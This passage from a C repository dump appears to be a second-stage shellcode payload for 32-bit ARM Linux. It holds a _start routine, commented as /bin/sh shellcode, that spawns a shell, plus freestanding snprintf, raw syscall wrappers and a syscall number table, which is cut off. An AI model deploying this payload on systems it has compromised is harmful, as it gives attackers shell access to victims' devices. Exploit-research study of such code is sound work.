MAP_ANONYMOUS 0x20 39 | 40 | #endif 41 | -------------------------------------------------------------------------------- /stage2/main.c: -------------------------------------------------------------------------------- 1 | // #include "utils.h" 2 | 3 | void _start() 4 | { 5 | // simple /bin/sh shellcode 6 | _execve("/bin/sh", NULL, NULL); 7 | 8 | // // test a few of the syscalls 9 | // printf("> _start @ 0x%llx\n", _start); 10 | // void * mem = _mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 11 | // printf("> hello, mem @ 0x%llx\n", mem); 12 | // *(int*)mem = 1; 13 | // _exit(3); 14 | } 15 | -------------------------------------------------------------------------------- 
/stage2/snprintf.c: -------------------------------------------------------------------------------- 1 | /**************************************************************************** 2 | 3 | Copyright (c) 1999,2000 WU-FTPD Development Group. 4 | All rights reserved. 5 | 6 | Portions Copyright (c) 1980, 1985, 1988, 1989, 1990, 1991, 1993, 1994 7 | The Regents of the University of California. 8 | Portions Copyright (c) 1993, 1994 Washington University in Saint Louis. 9 | Portions Copyright (c) 1996, 1998 Berkeley Software Design, Inc. 10 | Portions Copyright (c) 1989 Massachusetts Institute of Technology. 11 | Portions Copyright (c) 1998 Sendmail, Inc. 12 | Portions Copyright (c) 1983, 1995, 1996, 1997 Eric P. Allman. 13 | Portions Copyright (c) 1997 by Stan Barber. 14 | Portions Copyright (c) 1997 by Kent Landfield. 15 | Portions Copyright (c) 1991, 1992, 1993, 1994, 1995, 1996, 1997 16 | Free Software Foundation, Inc. 17 | 18 | Use and distribution of this software and its source code are governed 19 | by the terms and conditions of the WU-FTPD Software License ("LICENSE"). 20 | 21 | If you did not receive a copy of the license, it may be obtained online 22 | at http://www.wu-ftpd.org/license.html. 23 | 24 | $Id: snprintf.c,v 1.1 2001/07/06 19:23:39 scut Exp $ 25 | 26 | ****************************************************************************/ 27 | 28 | #ifndef __P 29 | #define __P(p) p 30 | #endif 31 | 32 | #include 33 | #define VA_LOCAL_DECL va_list ap; 34 | #define VA_START(f) va_start(ap, f) 35 | #define VA_END va_end(ap) 36 | 37 | #ifdef SOLARIS2 38 | #ifdef _FILE_OFFSET_BITS 39 | #define SOLARIS26 40 | #endif 41 | #endif 42 | 43 | #ifdef SOLARIS26 44 | #define HAS_SNPRINTF 45 | #define HAS_VSNPRINTF 46 | #endif 47 | #ifdef _SCO_DS_ 48 | #define HAS_SNPRINTF 49 | #endif 50 | #ifdef luna2 51 | #define HAS_VSNPRINTF 52 | #endif 53 | /* 54 | ** SNPRINTF, VSNPRINT -- counted versions of printf 55 | ** 56 | ** These versions have been grabbed off the net. 
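They have been
 ** cleaned up to compile properly and support for .precision and
 ** %lx has been added.
 */

/**************************************************************
 * Original:
 * Patrick Powell Tue Apr 11 09:48:21 PDT 1995
 * A bombproof version of doprnt (dopr) included.
 * Sigh.  This sort of thing is always nasty do deal with.  Note that
 * the version here does not include floating point...
 *
 * snprintf() is used instead of sprintf() as it does limit checks
 * for string length.  This covers a nasty loophole.
 *
 * The other functions are there to prevent NULL pointers from
 * causing nast effects.
 **************************************************************/

/*static char _id[] = "$Id: snprintf.c,v 1.1 2001/07/06 19:23:39 scut Exp $"; */
static void dopr(char *, const char *, va_list);

/*
 * Address of the byte reserved for the terminating NUL; dopr_outch()
 * refuses to write at or beyond it.  A value of 0 means "no limit".
 * Set by vsnprintf() on every call.  Because this and `output` below are
 * file-scope statics, the formatter is not reentrant: a nested or
 * concurrent call clobbers the bounds of the outer one.
 */
static char *end;

#ifndef HAS_VSNPRINTF
/*
 * vsnprintf(): format `fmt` with `args` into `str`, writing at most
 * `count` bytes including the terminating NUL.
 *
 * Returns the length of the string actually stored (truncated output
 * counts as truncated, unlike C99 which reports the untruncated length).
 * With count <= 0 nothing is written and 0 is returned.
 */
int vsnprintf(char *str, int count, const char *fmt, va_list args)
{
    int n = 0;

    /* A zero-sized buffer has no room even for the NUL; the previous
     * version stored str[0] = 0 before looking at count. */
    if (count <= 0)
        return 0;
    str[0] = 0;
    end = str + count - 1;      /* last byte is reserved for the NUL */
    dopr(str, fmt, args);
    end[0] = 0;                 /* terminate even when output was cut */
    while (*str++)
        n++;
    return n;
}

#ifndef HAS_SNPRINTF
/* VARARGS3 */
/*
 * snprintf(): variadic front end for vsnprintf(); same return value.
 */
int snprintf(char *str, int count, const char *fmt,...)
{
    int len;
    VA_LOCAL_DECL

    VA_START(fmt);
    len = vsnprintf(str, count, fmt, ap);
    VA_END;
    return len;
}
#endif

/*
 * dopr(): poor man's version of doprintf
 */

static void fmtstr __P((char *value, int ljust, int len, int zpad, int maxwidth));
static void fmtnum __P((long value, int base, int dosign, int ljust, int len, int zpad));
static void dostr __P((char *, int));
/* Next byte dopr_outch() will write; reset to the buffer start by dopr(). */
static char *output;
static void dopr_outch __P((int c));

/*
 * dopr(): walk `format` and emit each directive through fmtstr(),
 * fmtnum() or dopr_outch().  Supported: flags '-' and '0', width and
 * precision as digits or '*', the 'l' length modifier, and the
 * conversions u U o O d D x X s c %.  An unknown conversion emits
 * "???????"; a format that ends inside a directive emits
 * "**end of format**".  The output is NUL-terminated at the current
 * position on every exit path, subject to the `end` bound.
 */
static void dopr(char *buffer, const char *format, va_list args)
{
    int ch;
    long value;
    int longflag = 0;
    int pointflag = 0;
    int maxwidth = 0;
    char *strvalue;
    int ljust;
    int len;
    int zpad;

    output = buffer;
    while ((ch = *format++)) {
        switch (ch) {
        case '%':
            ljust = len = zpad = maxwidth = 0;
            longflag = pointflag = 0;
        nextch:
            ch = *format++;
            switch (ch) {
            case 0:
                dostr("**end of format**", 0);
                /* The previous version returned without terminating,
                 * leaving whatever followed in the buffer as part of
                 * the result. */
                *output = 0;
                return;
            case '-':
                ljust = 1;
                goto nextch;
            case '0':       /* set zero padding if len not set */
                if (len == 0 && !pointflag)
                    zpad = '0';
                /* FALLTHROUGH: a '0' after the first width digit is a digit */
            case '1':
            case '2':
            case '3':
            case '4':
            case '5':
            case '6':
            case '7':
            case '8':
            case '9':
                if (pointflag)
                    maxwidth = maxwidth * 10 + ch - '0';
                else
                    len = len * 10 + ch - '0';
                goto nextch;
            case '*':
                if (pointflag)
                    maxwidth = va_arg(args, int);
                else
                    len = va_arg(args, int);
                goto nextch;
            case '.':
                pointflag = 1;
                goto nextch;
            case 'l':
                longflag = 1;
                goto nextch;
            case 'u':
            case 'U':
                /*fmtnum(value,base,dosign,ljust,len,zpad) */
                /* Unsigned conversions read an unsigned int so a 32-bit
                 * argument is zero-extended, not sign-extended, where
                 * long is 64 bits wide (otherwise %u of 0xffffffff
                 * printed 18446744073709551615 on 64-bit targets). */
                value = longflag ? va_arg(args, long) : (long) va_arg(args, unsigned int);
                fmtnum(value, 10, 0, ljust, len, zpad);
                break;
            case 'o':
            case 'O':
                /*fmtnum(value,base,dosign,ljust,len,zpad) */
                value = longflag ? va_arg(args, long) : (long) va_arg(args, unsigned int);
                fmtnum(value, 8, 0, ljust, len, zpad);
                break;
            case 'd':
            case 'D':
                /* signed: sign-extending an int into long is the intent */
                value = longflag ? va_arg(args, long) : (long) va_arg(args, int);
                fmtnum(value, 10, 1, ljust, len, zpad);
                break;
            case 'x':
                value = longflag ? va_arg(args, long) : (long) va_arg(args, unsigned int);
                fmtnum(value, 16, 0, ljust, len, zpad);
                break;
            case 'X':
                value = longflag ? va_arg(args, long) : (long) va_arg(args, unsigned int);
                /* negative base selects upper-case digits in fmtnum() */
                fmtnum(value, -16, 0, ljust, len, zpad);
                break;
            case 's':
                strvalue = va_arg(args, char *);
                /* "%.0s" prints nothing, as in C */
                if (maxwidth > 0 || !pointflag) {
                    if (pointflag && len > maxwidth)
                        len = maxwidth;     /* Adjust padding */
                    fmtstr(strvalue, ljust, len, zpad, maxwidth);
                }
                break;
            case 'c':
                ch = va_arg(args, int);
                dopr_outch(ch);
                break;
            case '%':
                dopr_outch(ch);
                continue;
            default:
                dostr("???????", 0);
            }
            break;
        default:
            dopr_outch(ch);
            break;
        }
    }
    *output = 0;
}

/*
 * fmtstr(): emit `value` (a NULL pointer prints as ""), cut to
 * `maxwidth` bytes when maxwidth is non-zero, and padded with spaces
 * up to `len` bytes — on the left, or on the right when `ljust`.
 * `zpad` is accepted for symmetry with fmtnum() but strings are never
 * zero padded.
 */
static void fmtstr(char *value, int ljust, int len, int zpad, int maxwidth)
{
    int padlen, slen;   /* amount to pad / bytes that will be emitted */

    if (value == 0) {
        value = "";
    }
    for (slen = 0; value[slen]; ++slen);    /* strlen */
    if (slen > maxwidth && maxwidth)
        slen = maxwidth;
    padlen = len - slen;
    if (padlen < 0)
        padlen = 0;
    if (ljust)
        padlen = -padlen;   /* negative padlen means "pad on the right" */
    while (padlen > 0) {
        dopr_outch(' ');
        --padlen;
    }
    dostr(value, maxwidth);
    while (padlen < 0) {
        dopr_outch(' ');
        ++padlen;
    }
}

/*
 * fmtnum(): emit `value` in `base` (8, 10 or 16 as used by dopr(); a
 * negative base selects upper-case hex digits).  With `dosign` the
 * value is treated as signed and a '-' is printed for negatives;
 * otherwise its bits are taken as an unsigned long.  Padded to `len`
 * with `zpad` (the character '0') or spaces, left-justified when
 * `ljust`.  Zero padding goes between the sign and the digits.
 */
static void fmtnum(long value, int base, int dosign, int ljust, int len, int zpad)
{
    int signvalue = 0;
    unsigned long uvalue;
    /* Worst case is base 8: three bits per digit, rounded up, plus the
     * NUL.  The previous fixed convert[20] overflowed for 64-bit values
     * (%lu of ULONG_MAX needs 20 digits + NUL, %lo needs 22 + NUL). */
    char convert[sizeof(unsigned long) * 3 + 2];
    int place = 0;
    int padlen = 0;     /* amount to pad */
    int caps = 0;

    /* DEBUGP(("value 0x%x, base %d, dosign %d, ljust %d, len %d, zpad %d\n",
       value, base, dosign, ljust, len, zpad )); */
    uvalue = value;
    if (dosign) {
        if (value < 0) {
            signvalue = '-';
            /* negate in unsigned arithmetic: -LONG_MIN overflows long */
            uvalue = 0UL - (unsigned long) value;
        }
    }
    if (base < 0) {
        caps = 1;
        base = -base;
    }
    /* digits are produced least significant first and emitted in reverse */
    do {
        convert[place++] =
            (caps ? "0123456789ABCDEF" : "0123456789abcdef")
            [uvalue % (unsigned) base];
        uvalue = (uvalue / (unsigned) base);
    } while (uvalue);
    convert[place] = 0;
    padlen = len - place;
    if (padlen < 0)
        padlen = 0;
    if (ljust)
        padlen = -padlen;
    /* DEBUGP(( "str '%s', place %d, sign %c, padlen %d\n",
       convert,place,signvalue,padlen)); */
    if (zpad && padlen > 0) {
        if (signvalue) {
            dopr_outch(signvalue);
            --padlen;
            signvalue = 0;
        }
        while (padlen > 0) {
            dopr_outch(zpad);
            --padlen;
        }
    }
    while (padlen > 0) {
        dopr_outch(' ');
        --padlen;
    }
    if (signvalue)
        dopr_outch(signvalue);
    while (place > 0)
        dopr_outch(convert[--place]);
    while (padlen < 0) {
        dopr_outch(' ');
        ++padlen;
    }
}

/*
 * dostr(): emit `str` in full when `cut` is 0, otherwise at most `cut`
 * bytes of it (a negative cut therefore emits nothing).
 */
static void dostr(char *str, int cut)
{
    if (cut) {
        while (*str && cut-- > 0)
            dopr_outch(*str++);
    }
    else {
        while (*str)
            dopr_outch(*str++);
    }
}

/*
 * dopr_outch(): append one byte at `output`, silently dropping it once
 * `output` has reached `end` (end == 0 disables the bound).
 */
static void dopr_outch(int c)
{
#if 0
    if (iscntrl(c) && c != '\n' && c != '\t') {
        c = '@' + (c & 0x1F);
        if (end == 0 || output < end)
            *output++ = '^';
    }
#endif
    if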
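(end == 0 || output < end)
        *output++ = c;
}

#endif

--------------------------------------------------------------------------------
/stage2/syscall_arm.c:
--------------------------------------------------------------------------------
#include "syscall_arm.h"
#include "linuxdefs.h"

/*
 * Raw Linux system call wrappers for 32-bit ARM (EABI): arguments go in
 * r0-r5, the call number in r7, and "swi #0" traps into the kernel, which
 * leaves the result in r0.  Every wrapper returns that raw value, so a
 * failure shows up as a negative errno, not as -1 with errno set.
 *
 * Each asm statement declares a "memory" clobber: the kernel reads or
 * writes memory the compiler cannot see (buf, path, argv...), so without
 * it the compiler may keep a buffer's contents in registers across the
 * trap or sink the stores that fill it below the call.
 */

/* read(2): read up to `size` bytes from `fd` into `buf`. */
ssize_t _read(int fd, void *buf, size_t size)
{
    ssize_t ret;
    register int r0 asm ("r0") = (int)fd;
    register int r1 asm ("r1") = (int)buf;
    register int r2 asm ("r2") = (int)size;
    register int r7 asm ("r7") = __NR_read;

    asm volatile
    (
        "swi #0; mov %0, r0"
        : "=r" (ret)
        : "r"(r7), "r"(r0), "r"(r1), "r"(r2)
        : "memory"
    );
    return ret;
}

/* write(2): write up to `size` bytes from `buf` to `fd`. */
ssize_t _write(int fd, const void *buf, size_t size)
{
    ssize_t ret;
    register int r0 asm ("r0") = (int)fd;
    register int r1 asm ("r1") = (int)buf;
    register int r2 asm ("r2") = (int)size;
    register int r7 asm ("r7") = __NR_write;

    asm volatile
    (
        "swi #0; mov %0, r0"
        : "=r" (ret)
        : "r"(r7), "r"(r0), "r"(r1), "r"(r2)
        : "memory"
    );
    return ret;
}

/*
 * open(2).  The kernel takes (path, flags, mode) in r0-r2, so the
 * second argument here is what the kernel treats as the open flags and
 * the third as the file mode, whatever the parameter names suggest.
 */
int _open(char * path, int mode, int flags)
{
    long ret;
    register int r0 asm ("r0") = (int)path;
    register int r1 asm ("r1") = (int)mode;
    register int r2 asm ("r2") = (int)flags;
    register int r7 asm ("r7") = __NR_open;

    asm volatile
    (
        "swi #0; mov %0, r0"
        : "=r" (ret)
        : "r"(r7), "r"(r0), "r"(r1), "r"(r2)
        : "memory"
    );
    return ret;
}

/* close(2). */
int _close(int fd)
{
    long ret;
    register int r0 asm ("r0") = (int)fd;
    register int r7 asm ("r7") = __NR_close;

    asm volatile
    (
        "swi #0; mov %0, r0"
        : "=r" (ret)
        : "r"(r7), "r"(r0)
        : "memory"
    );
    return ret;
}

/* lseek(2): reposition `fd` by `offset` relative to `whence`; returns the new offset. */
long _lseek(int fd, long offset, int whence)
{
    long ret;
    register int r0 asm ("r0") = (int)fd;
    register int r1 asm ("r1") = (int)offset;
    register int r2 asm ("r2") = (int)whence;
    register int r7 asm ("r7") = __NR_lseek;

    asm volatile
    (
        "swi #0; mov %0, r0"
        : "=r" (ret)
        : "r"(r7), "r"(r0), "r"(r1), "r"(r2)
        : "memory"
    );
    return ret;
}

/*
 * mmap(2) via mmap2: syscall_arm.h #undef's __NR_mmap for EABI, so the
 * six-register mmap2 form is used.  mmap2 expects `offset` in units of
 * 4096 bytes, not bytes, and the value is passed through unchanged —
 * this differs from the arm64 build, whose __NR_mmap takes a byte
 * offset, so C code shared across arches should pass 0 or convert.
 * Returns the raw kernel value: on failure a negative errno encoded as
 * a pointer.
 */
void * _mmap(void * start, long length, int prot, int flags, int fd, long offset)
{
    void * ret;
    register int r0 asm ("r0") = (int)start;
    register int r1 asm ("r1") = (int)length;
    register int r2 asm ("r2") = (int)prot;
    register int r3 asm ("r3") = (int)flags;
    register int r4 asm ("r4") = (int)fd;
    register int r5 asm ("r5") = (int)offset;
    register int r7 asm ("r7") = __NR_mmap2;

    asm volatile
    (
        "swi #0; mov %0, r0"
        : "=r" (ret)
        : "r"(r7), "r"(r0), "r"(r1), "r"(r2), "r"(r3), "r"(r4), "r"(r5)
        : "memory"
    );
    return ret;
}

/* mprotect(2): change the protection of the pages covering [addr, addr+len). */
long _mprotect(void * addr, long len, int prot)
{
    long ret;
    register int r0 asm ("r0") = (int)addr;
    register int r1 asm ("r1") = (int)len;
    register int r2 asm ("r2") = (int)prot;
    register int r7 asm ("r7") = __NR_mprotect;

    asm volatile
    (
        "swi #0; mov %0, r0"
        : "=r" (ret)
        : "r"(r7), "r"(r0), "r"(r1), "r"(r2)
        : "memory"
    );
    return ret;
}

/* munmap(2). */
long _munmap(char * start, int length)
{
    long ret;
    register int r0 asm ("r0") = (int)start;
    register int r1 asm ("r1") = (int)length;
    register int r7 asm ("r7") = __NR_munmap;

    asm volatile
    (
        "swi #0; mov %0, r0"
        : "=r" (ret)
        : "r"(r7), "r"(r0), "r"(r1)
        : "memory"
    );
    return ret;
}

/* brk(2): returns the kernel's (possibly unchanged) program break. */
long _brk(unsigned long addr)
{
    long ret;
    register int r0 asm ("r0") = (int)addr;
    register int r7 asm ("r7") = __NR_brk;

    asm volatile
    (
        "swi #0; mov %0, r0"
        : "=r" (ret)
        : "r"(r7), "r"(r0)
        : "memory"
    );
    return ret;
}

/* exit(2) with status `level`; the return statement is never reached. */
int _exit(int level)
{
    long ret;
    register int r0 asm ("r0") = (int)level;
    register int r7 asm ("r7") = __NR_exit;

    asm volatile
    (
        "swi #0; mov %0, r0"
        : "=r" (ret)
        : "r"(r7), "r"(r0)
        : "memory"
    );
    return ret;
}

/*
 * Terminates the process with status -1.
 * NOTE(review): presumably here so that compiler runtime helpers have a
 * raise() symbol to link against in this freestanding build — confirm.
 */
void raise(void)
{
    _exit(-1);
}

/* execve(2): replaces the current image; only returns on failure. */
long _execve(char * filename, char ** argv, char ** envp)
{
    long ret;
    register int r0 asm ("r0") = (int)filename;
    register int r1 asm ("r1") = (int)argv;
    register int r2 asm ("r2") = (int)envp;
    register int r7 asm ("r7") = __NR_execve;

    asm volatile
    (
        "swi #0; mov %0, r0"
        : "=r" (ret)
        : "r"(r7), "r"(r0), "r"(r1), "r"(r2)
        : "memory"
    );
    return ret;
}

--------------------------------------------------------------------------------
/stage2/syscall_arm.h:
--------------------------------------------------------------------------------
/*
 *  arch/arm/include/asm/unistd.h
 *
 *  Copyright (C) 2001-2005 Russell King
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License version 2 as
 * published by the Free Software Foundation.
 *
 * Please forward _all_ changes to this file to rmk@arm.linux.org.uk,
 * no matter what the change is.  Thanks!
 */
#ifndef _SYMB__ASM_ARM_UNISTD_H
#define _SYMB__ASM_ARM_UNISTD_H

#define __NR_OABI_SYSCALL_BASE  0x900000

#if defined(__thumb__) || defined(__ARM_EABI__)
#define __NR_SYSCALL_BASE   0
#else
#define __NR_SYSCALL_BASE   __NR_OABI_SYSCALL_BASE
#endif

/*
 * This file contains the system call numbers.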
26 | */ 27 | 28 | #define __NR_restart_syscall (__NR_SYSCALL_BASE+ 0) 29 | #define __NR_exit (__NR_SYSCALL_BASE+ 1) 30 | #define __NR_fork (__NR_SYSCALL_BASE+ 2) 31 | #define __NR_read (__NR_SYSCALL_BASE+ 3) 32 | #define __NR_write (__NR_SYSCALL_BASE+ 4) 33 | #define __NR_open (__NR_SYSCALL_BASE+ 5) 34 | #define __NR_close (__NR_SYSCALL_BASE+ 6) 35 | /* 7 was sys_waitpid */ 36 | #define __NR_creat (__NR_SYSCALL_BASE+ 8) 37 | #define __NR_link (__NR_SYSCALL_BASE+ 9) 38 | #define __NR_unlink (__NR_SYSCALL_BASE+ 10) 39 | #define __NR_execve (__NR_SYSCALL_BASE+ 11) 40 | #define __NR_chdir (__NR_SYSCALL_BASE+ 12) 41 | #define __NR_time (__NR_SYSCALL_BASE+ 13) 42 | #define __NR_mknod (__NR_SYSCALL_BASE+ 14) 43 | #define __NR_chmod (__NR_SYSCALL_BASE+ 15) 44 | #define __NR_lchown (__NR_SYSCALL_BASE+ 16) 45 | /* 17 was sys_break */ 46 | /* 18 was sys_stat */ 47 | #define __NR_lseek (__NR_SYSCALL_BASE+ 19) 48 | #define __NR_getpid (__NR_SYSCALL_BASE+ 20) 49 | #define __NR_mount (__NR_SYSCALL_BASE+ 21) 50 | #define __NR_umount (__NR_SYSCALL_BASE+ 22) 51 | #define __NR_setuid (__NR_SYSCALL_BASE+ 23) 52 | #define __NR_getuid (__NR_SYSCALL_BASE+ 24) 53 | #define __NR_stime (__NR_SYSCALL_BASE+ 25) 54 | #define __NR_ptrace (__NR_SYSCALL_BASE+ 26) 55 | #define __NR_alarm (__NR_SYSCALL_BASE+ 27) 56 | /* 28 was sys_fstat */ 57 | #define __NR_pause (__NR_SYSCALL_BASE+ 29) 58 | #define __NR_utime (__NR_SYSCALL_BASE+ 30) 59 | /* 31 was sys_stty */ 60 | /* 32 was sys_gtty */ 61 | #define __NR_access (__NR_SYSCALL_BASE+ 33) 62 | #define __NR_nice (__NR_SYSCALL_BASE+ 34) 63 | /* 35 was sys_ftime */ 64 | #define __NR_sync (__NR_SYSCALL_BASE+ 36) 65 | #define __NR_kill (__NR_SYSCALL_BASE+ 37) 66 | #define __NR_rename (__NR_SYSCALL_BASE+ 38) 67 | #define __NR_mkdir (__NR_SYSCALL_BASE+ 39) 68 | #define __NR_rmdir (__NR_SYSCALL_BASE+ 40) 69 | #define __NR_dup (__NR_SYSCALL_BASE+ 41) 70 | #define __NR_pipe (__NR_SYSCALL_BASE+ 42) 71 | #define __NR_times (__NR_SYSCALL_BASE+ 43) 72 | /* 44 was 
sys_prof */ 73 | #define __NR_brk (__NR_SYSCALL_BASE+ 45) 74 | #define __NR_setgid (__NR_SYSCALL_BASE+ 46) 75 | #define __NR_getgid (__NR_SYSCALL_BASE+ 47) 76 | /* 48 was sys_signal */ 77 | #define __NR_geteuid (__NR_SYSCALL_BASE+ 49) 78 | #define __NR_getegid (__NR_SYSCALL_BASE+ 50) 79 | #define __NR_acct (__NR_SYSCALL_BASE+ 51) 80 | #define __NR_umount2 (__NR_SYSCALL_BASE+ 52) 81 | /* 53 was sys_lock */ 82 | #define __NR_ioctl (__NR_SYSCALL_BASE+ 54) 83 | #define __NR_fcntl (__NR_SYSCALL_BASE+ 55) 84 | /* 56 was sys_mpx */ 85 | #define __NR_setpgid (__NR_SYSCALL_BASE+ 57) 86 | /* 58 was sys_ulimit */ 87 | /* 59 was sys_olduname */ 88 | #define __NR_umask (__NR_SYSCALL_BASE+ 60) 89 | #define __NR_chroot (__NR_SYSCALL_BASE+ 61) 90 | #define __NR_ustat (__NR_SYSCALL_BASE+ 62) 91 | #define __NR_dup2 (__NR_SYSCALL_BASE+ 63) 92 | #define __NR_getppid (__NR_SYSCALL_BASE+ 64) 93 | #define __NR_getpgrp (__NR_SYSCALL_BASE+ 65) 94 | #define __NR_setsid (__NR_SYSCALL_BASE+ 66) 95 | #define __NR_sigaction (__NR_SYSCALL_BASE+ 67) 96 | /* 68 was sys_sgetmask */ 97 | /* 69 was sys_ssetmask */ 98 | #define __NR_setreuid (__NR_SYSCALL_BASE+ 70) 99 | #define __NR_setregid (__NR_SYSCALL_BASE+ 71) 100 | #define __NR_sigsuspend (__NR_SYSCALL_BASE+ 72) 101 | #define __NR_sigpending (__NR_SYSCALL_BASE+ 73) 102 | #define __NR_sethostname (__NR_SYSCALL_BASE+ 74) 103 | #define __NR_setrlimit (__NR_SYSCALL_BASE+ 75) 104 | #define __NR_getrlimit (__NR_SYSCALL_BASE+ 76) /* Back compat 2GB limited rlimit */ 105 | #define __NR_getrusage (__NR_SYSCALL_BASE+ 77) 106 | #define __NR_gettimeofday (__NR_SYSCALL_BASE+ 78) 107 | #define __NR_settimeofday (__NR_SYSCALL_BASE+ 79) 108 | #define __NR_getgroups (__NR_SYSCALL_BASE+ 80) 109 | #define __NR_setgroups (__NR_SYSCALL_BASE+ 81) 110 | #define __NR_select (__NR_SYSCALL_BASE+ 82) 111 | #define __NR_symlink (__NR_SYSCALL_BASE+ 83) 112 | /* 84 was sys_lstat */ 113 | #define __NR_readlink (__NR_SYSCALL_BASE+ 85) 114 | #define __NR_uselib 
(__NR_SYSCALL_BASE+ 86) 115 | #define __NR_swapon (__NR_SYSCALL_BASE+ 87) 116 | #define __NR_reboot (__NR_SYSCALL_BASE+ 88) 117 | #define __NR_readdir (__NR_SYSCALL_BASE+ 89) 118 | #define __NR_mmap (__NR_SYSCALL_BASE+ 90) 119 | #define __NR_munmap (__NR_SYSCALL_BASE+ 91) 120 | #define __NR_truncate (__NR_SYSCALL_BASE+ 92) 121 | #define __NR_ftruncate (__NR_SYSCALL_BASE+ 93) 122 | #define __NR_fchmod (__NR_SYSCALL_BASE+ 94) 123 | #define __NR_fchown (__NR_SYSCALL_BASE+ 95) 124 | #define __NR_getpriority (__NR_SYSCALL_BASE+ 96) 125 | #define __NR_setpriority (__NR_SYSCALL_BASE+ 97) 126 | /* 98 was sys_profil */ 127 | #define __NR_statfs (__NR_SYSCALL_BASE+ 99) 128 | #define __NR_fstatfs (__NR_SYSCALL_BASE+100) 129 | /* 101 was sys_ioperm */ 130 | #define __NR_socketcall (__NR_SYSCALL_BASE+102) 131 | #define __NR_syslog (__NR_SYSCALL_BASE+103) 132 | #define __NR_setitimer (__NR_SYSCALL_BASE+104) 133 | #define __NR_getitimer (__NR_SYSCALL_BASE+105) 134 | #define __NR_stat (__NR_SYSCALL_BASE+106) 135 | #define __NR_lstat (__NR_SYSCALL_BASE+107) 136 | #define __NR_fstat (__NR_SYSCALL_BASE+108) 137 | /* 109 was sys_uname */ 138 | /* 110 was sys_iopl */ 139 | #define __NR_vhangup (__NR_SYSCALL_BASE+111) 140 | /* 112 was sys_idle */ 141 | #define __NR_syscall (__NR_SYSCALL_BASE+113) /* syscall to call a syscall! 
*/ 142 | #define __NR_wait4 (__NR_SYSCALL_BASE+114) 143 | #define __NR_swapoff (__NR_SYSCALL_BASE+115) 144 | #define __NR_sysinfo (__NR_SYSCALL_BASE+116) 145 | #define __NR_ipc (__NR_SYSCALL_BASE+117) 146 | #define __NR_fsync (__NR_SYSCALL_BASE+118) 147 | #define __NR_sigreturn (__NR_SYSCALL_BASE+119) 148 | #define __NR_clone (__NR_SYSCALL_BASE+120) 149 | #define __NR_setdomainname (__NR_SYSCALL_BASE+121) 150 | #define __NR_uname (__NR_SYSCALL_BASE+122) 151 | /* 123 was sys_modify_ldt */ 152 | #define __NR_adjtimex (__NR_SYSCALL_BASE+124) 153 | #define __NR_mprotect (__NR_SYSCALL_BASE+125) 154 | #define __NR_sigprocmask (__NR_SYSCALL_BASE+126) 155 | /* 127 was sys_create_module */ 156 | #define __NR_init_module (__NR_SYSCALL_BASE+128) 157 | #define __NR_delete_module (__NR_SYSCALL_BASE+129) 158 | /* 130 was sys_get_kernel_syms */ 159 | #define __NR_quotactl (__NR_SYSCALL_BASE+131) 160 | #define __NR_getpgid (__NR_SYSCALL_BASE+132) 161 | #define __NR_fchdir (__NR_SYSCALL_BASE+133) 162 | #define __NR_bdflush (__NR_SYSCALL_BASE+134) 163 | #define __NR_sysfs (__NR_SYSCALL_BASE+135) 164 | #define __NR_personality (__NR_SYSCALL_BASE+136) 165 | /* 137 was sys_afs_syscall */ 166 | #define __NR_setfsuid (__NR_SYSCALL_BASE+138) 167 | #define __NR_setfsgid (__NR_SYSCALL_BASE+139) 168 | #define __NR__llseek (__NR_SYSCALL_BASE+140) 169 | #define __NR_getdents (__NR_SYSCALL_BASE+141) 170 | #define __NR__newselect (__NR_SYSCALL_BASE+142) 171 | #define __NR_flock (__NR_SYSCALL_BASE+143) 172 | #define __NR_msync (__NR_SYSCALL_BASE+144) 173 | #define __NR_readv (__NR_SYSCALL_BASE+145) 174 | #define __NR_writev (__NR_SYSCALL_BASE+146) 175 | #define __NR_getsid (__NR_SYSCALL_BASE+147) 176 | #define __NR_fdatasync (__NR_SYSCALL_BASE+148) 177 | #define __NR__sysctl (__NR_SYSCALL_BASE+149) 178 | #define __NR_mlock (__NR_SYSCALL_BASE+150) 179 | #define __NR_munlock (__NR_SYSCALL_BASE+151) 180 | #define __NR_mlockall (__NR_SYSCALL_BASE+152) 181 | #define __NR_munlockall 
(__NR_SYSCALL_BASE+153) 182 | #define __NR_sched_setparam (__NR_SYSCALL_BASE+154) 183 | #define __NR_sched_getparam (__NR_SYSCALL_BASE+155) 184 | #define __NR_sched_setscheduler (__NR_SYSCALL_BASE+156) 185 | #define __NR_sched_getscheduler (__NR_SYSCALL_BASE+157) 186 | #define __NR_sched_yield (__NR_SYSCALL_BASE+158) 187 | #define __NR_sched_get_priority_max (__NR_SYSCALL_BASE+159) 188 | #define __NR_sched_get_priority_min (__NR_SYSCALL_BASE+160) 189 | #define __NR_sched_rr_get_interval (__NR_SYSCALL_BASE+161) 190 | #define __NR_nanosleep (__NR_SYSCALL_BASE+162) 191 | #define __NR_mremap (__NR_SYSCALL_BASE+163) 192 | #define __NR_setresuid (__NR_SYSCALL_BASE+164) 193 | #define __NR_getresuid (__NR_SYSCALL_BASE+165) 194 | /* 166 was sys_vm86 */ 195 | /* 167 was sys_query_module */ 196 | #define __NR_poll (__NR_SYSCALL_BASE+168) 197 | #define __NR_nfsservctl (__NR_SYSCALL_BASE+169) 198 | #define __NR_setresgid (__NR_SYSCALL_BASE+170) 199 | #define __NR_getresgid (__NR_SYSCALL_BASE+171) 200 | #define __NR_prctl (__NR_SYSCALL_BASE+172) 201 | #define __NR_rt_sigreturn (__NR_SYSCALL_BASE+173) 202 | #define __NR_rt_sigaction (__NR_SYSCALL_BASE+174) 203 | #define __NR_rt_sigprocmask (__NR_SYSCALL_BASE+175) 204 | #define __NR_rt_sigpending (__NR_SYSCALL_BASE+176) 205 | #define __NR_rt_sigtimedwait (__NR_SYSCALL_BASE+177) 206 | #define __NR_rt_sigqueueinfo (__NR_SYSCALL_BASE+178) 207 | #define __NR_rt_sigsuspend (__NR_SYSCALL_BASE+179) 208 | #define __NR_pread64 (__NR_SYSCALL_BASE+180) 209 | #define __NR_pwrite64 (__NR_SYSCALL_BASE+181) 210 | #define __NR_chown (__NR_SYSCALL_BASE+182) 211 | #define __NR_getcwd (__NR_SYSCALL_BASE+183) 212 | #define __NR_capget (__NR_SYSCALL_BASE+184) 213 | #define __NR_capset (__NR_SYSCALL_BASE+185) 214 | #define __NR_sigaltstack (__NR_SYSCALL_BASE+186) 215 | #define __NR_sendfile (__NR_SYSCALL_BASE+187) 216 | /* 188 reserved */ 217 | /* 189 reserved */ 218 | #define 